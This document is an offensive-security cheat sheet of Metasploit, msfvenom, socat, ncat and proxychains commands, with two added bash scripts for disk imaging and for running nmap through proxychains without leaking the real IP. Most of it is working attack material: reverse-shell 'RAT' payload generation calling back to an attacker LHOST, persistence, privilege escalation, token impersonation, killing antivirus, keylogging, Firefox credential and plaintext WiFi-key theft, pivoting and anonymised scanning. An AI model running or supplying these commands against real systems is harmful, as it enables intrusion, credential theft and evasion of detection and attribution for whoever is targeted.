Start a Shell in Python (upgrade a dumb reverse shell to a proper PTY):
python -c 'import pty; pty.spawn("/bin/bash")' (use python3 if python is not on the box)
Export WiFi Keys:
netsh wlan export profile folder=%TEMP% key=clear (without key=clear the exported XML omits the plaintext PSK)
cat /etc/wpa_supplicant.conf (or /etc/wpa_supplicant/wpa_supplicant.conf; NetworkManager stores PSKs under /etc/NetworkManager/system-connections/)
Check for MS08-067:
nmap -p 445 --script=smb-vuln-ms08-067 <target>
(older Nmap releases used --script=smb-check-vulns --script-args=unsafe=1; that script was split into the smb-vuln-* scripts, and unsafe=1 could crash the target)
Create RAT:
msfvenom -p windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> -f exe -o rat.exe
(legacy syntax: msfpayload windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> X > rat.exe)
Create VBS RAT:
msfvenom -p windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> -f raw -o rat.raw
python shellcode2vbscript.py rat.raw rat.vbs
(legacy: msfpayload ... R > rat.raw; msfvenom -f vbs also emits the VBScript directly)
Encode RAT:
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -i <iterations> -f exe -o rat.exe
(msfencode and msfpayload were retired in 2015; msfvenom does both jobs. Encoding alone is not AV evasion: the decoder stub is well signatured.)
Listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <port>
Listen for multiple connections:
set ExitOnSession false (otherwise the handler job quits after the first session)
exploit -j -z / sessions / sessions -i <id>
Hijack another process (move Meterpreter out of the short-lived payload process into a stable one; ps to pick a PID, getpid to confirm afterwards):
migrate <pid> or run post/windows/manage/migrate NAME=<process name> (legacy script: run migrate -n <process name>)
Install RAT (persistence; record what it drops so it can be removed at the end of the engagement):
run persistence -X -i <seconds> -p <port> -r <ip> (legacy script; current modules are post/windows/manage/persistence_exe and exploit/windows/local/persistence)
Elevate to SYSTEM (requires local admin; run getuid afterwards to confirm NT AUTHORITY\SYSTEM):
getsystem
Metasploit pivoting (reach the LAN behind the already compromised host through its session):
run autoroute -s <local network/cidr> (or run post/multi/manage/autoroute; route print to check). Then start auxiliary/server/socks_proxy and point proxychains at it to push other tools through the pivot.
Impersonate users (needs SYSTEM or SeImpersonatePrivilege to see other users' tokens):
load incognito, list_tokens -u, impersonate_token "<DOMAIN>\\<user>" (double backslash in the Meterpreter console)
Metasploit: kill av (run killav, an old Meterpreter script; it matches a fixed list of AV process names and needs SYSTEM)
Disk imaging and carving:
dd if=<device or in file> of=<out file> bs=512 conv=noerror,sync
$ sha256sum <in file> <out file> (hash both sides before touching the image)
$ mkdir <mountpoint>
$ mount -o loop,ro -t <type> <image> <mountpoint> (ro so the evidence is never modified)
$ foremost -i <image> -o <outdir> -t all -v
$ scalpel -c <scalpel.conf> -o <outdir> <image>
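The imaging, hashing, read-only mount and carving steps above as one script. This is an added example, not from the original cheat sheet; it assumes GNU coreutils (dd, sha256sum), util-linux mount and foremost, and /dev/sdb, evidence.dd and /mnt/evidence are illustrative names.

```bash
#!/usr/bin/env bash
# Added example: image a device with dd, hash source and image so the copy can be proven
# faithful, then mount it read-only and carve it. Assumes GNU coreutils and util-linux;
# /dev/sdb, evidence.dd and the mount point are illustrative.
set -eu

# image_and_verify <source device or file> <output image>
# bs=512 matches the sector size, so conv=sync never pads the final block;
# conv=noerror,sync keeps offsets stable if a sector fails to read (the bad
# sector becomes a zero-filled block, and the hashes will then differ by design).
# Prints the SHA-256 of the image and writes <image>.sha256; fails on mismatch.
image_and_verify() {
  src=$1
  img=$2
  dd if="$src" of="$img" bs=512 conv=noerror,sync status=none
  src_hash=$(sha256sum "$src" | cut -d' ' -f1)
  img_hash=$(sha256sum "$img" | cut -d' ' -f1)
  printf '%s  %s\n' "$img_hash" "$img" > "$img.sha256"
  if [ "$src_hash" != "$img_hash" ]; then
    echo "hash mismatch: source=$src_hash image=$img_hash" >&2
    return 1
  fi
  echo "$img_hash"
}

# mount_image_ro <image> <mountpoint>
# Loop mount read-only; noexec/nosuid/nodev so nothing inside the evidence can run. Needs root.
mount_image_ro() {
  mkdir -p "$2"
  mount -o loop,ro,noexec,nosuid,nodev "$1" "$2"
}

# carve <image> <outdir>: foremost over the whole image, all built-in file types
carve() {
  foremost -i "$1" -o "$2" -t all -v
}

# Usage (as root):
#   image_and_verify /dev/sdb evidence.dd
#   mount_image_ro evidence.dd /mnt/evidence
#   carve evidence.dd carved/
```

A hash mismatch on a physical disk usually means unreadable sectors rather than a broken copy; log the dd error count and re-run, and keep the .sha256 file with the image so anyone can re-verify it later.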
Metasploit: run post/* (e.g. run post/windows/capture/keylog_recorder)
run post/multi/gather/firefox_creds
run post/windows/gather/dumplinks
Metasploit: download <remote file> <local dir> (Meterpreter download command; upload is the reverse)
Listen-Connect (relay connections on lport to rhost:rport):
socat tcp-listen:<lport>,reuseaddr tcp-connect:<rhost>:<rport> (add ,fork after reuseaddr to serve more than one connection)
ncat -l <lport> -c "ncat <rhost> <rport>"
Listen-Listen (connect to lport1, then lport2):
socat tcp-listen:<lport1>,reuseaddr tcp-listen:<lport2>
ncat -l <lport1> -c "ncat -l <lport2>"
Connect-Connect (listeners must first be set up on both rhost:rport pairs):
socat tcp-connect:<rhost1>:<rport1>,reuseaddr tcp-connect:<rhost2>:<rport2>
ncat <rhost1> <rport1> -c "ncat <rhost2> <rport2>"
SSH Tunnels:
ssh <user>@<host> -L <lport>:<rhost>:<rport> (local forward: localhost:<lport> reaches <rhost>:<rport> as seen from <host>)
ssh <user>@<host> -R <port>:<rhost>:<rport> (remote forward: <host>:<port> reaches <rhost>:<rport> as seen from your side)
SSH into a jumpbox and run tshark:
jumpbox$ tshark -i eth0 not port 22 and tcp
See what a non-anonymous scan looks like (your public IP will show up in tshark):
localhost$ nmap <jumpbox ip> -p 80
Test anonymous scanning (real IP still shows up in tshark: proxychains only hooks connect() via LD_PRELOAD, and the default SYN scan uses raw sockets that bypass it):
localhost$ proxychains nmap <jumpbox ip> -p 80
Run an anonymous connect scan (real IP only shows up initially in tshark, from the raw host-discovery probes):
localhost$ proxychains nmap -sT <jumpbox ip> -p 80
Try again with host discovery disabled (real IP does not show up in tshark):
localhost$ proxychains nmap -sT -Pn <jumpbox ip> -p 80
Note: scanning a hostname instead of an IP sends a DNS request from your real IP; scan the IP directly (see proxyresolv) and pass -n so nmap does not reverse-resolve the target either.
Set up iptables to drop direct traffic to the target (forces everything over proxychains; traffic to the proxy itself is unaffected; delete the rule with -D afterwards):
iptables -A OUTPUT -d <target ip> -j DROP
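The scan-through-proxychains checks above, turned into a wrapper that refuses any invocation that would leak: only a literal IPv4 target, only a connect scan with host discovery and DNS off, and an iptables DROP for the target that is removed again on exit. Added example, not from the original cheat sheet; it assumes Linux iptables, a working proxychains configuration, and root for the iptables rules.

```bash
#!/usr/bin/env bash
# Added example: run nmap only in the form that stays behind proxychains (connect scan,
# no host discovery, no DNS, literal IPv4 target) and drop direct packets to the target
# for the duration of the scan. Assumes Linux iptables and a configured proxychains;
# needs root for the iptables rules.
set -eu

# is_ipv4 <string>: true only for a dotted-quad literal; a hostname would leak a DNS query
is_ipv4() {
  ip=$1
  case $ip in
    *[!0-9.]*) return 1 ;;
  esac
  oldifs=$IFS
  IFS=.
  set -- $ip
  IFS=$oldifs
  [ "$#" -eq 4 ] || return 1
  for o in "$@"; do
    [ -n "$o" ] && [ "$o" -le 255 ] || return 1
  done
}

# proxied_nmap_cmd <ip> <ports>: the only nmap command line the wrapper will run.
# -sT: connect() scan, so the LD_PRELOAD hook sees every connection (SYN scans use raw sockets)
# -Pn: no host-discovery probes (ICMP/raw, sent from the real IP)
# -n : no reverse-DNS lookup of the target (UDP, not proxied)
proxied_nmap_cmd() {
  echo "proxychains nmap -sT -Pn -n -p $2 $1"
}

# proxied_scan <ip> <ports>: block direct traffic to the target, scan, then remove the rule
proxied_scan() {
  target=$1
  ports=$2
  is_ipv4 "$target" || { echo "refusing non-IP target '$target' (would leak DNS)" >&2; return 1; }
  case $ports in
    *[!0-9,-]*) echo "bad port spec '$ports'" >&2; return 1 ;;
  esac
  iptables -I OUTPUT -d "$target" -j DROP
  trap 'iptables -D OUTPUT -d "$target" -j DROP' EXIT
  eval "$(proxied_nmap_cmd "$target" "$ports")"
}

# Usage: ./pscan.sh <target ip> <ports>, e.g. ./pscan.sh 203.0.113.10 80,443
if [ "$#" -gt 0 ]; then
  proxied_scan "$@"
fi
```

Watch tshark on the jumpbox while the wrapper runs: with the DROP rule in place, anything nmap still tries to send directly never leaves your host, so the only packets that reach the target come from the proxy.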
File transfer (the listener serves the file and the client pulls it; verify with sha256sum on both ends):
nc -l -p <port> < <input file> (OpenBSD nc takes no -p: nc -l <port> < <input file>)
nc <ip> <port> > <output file>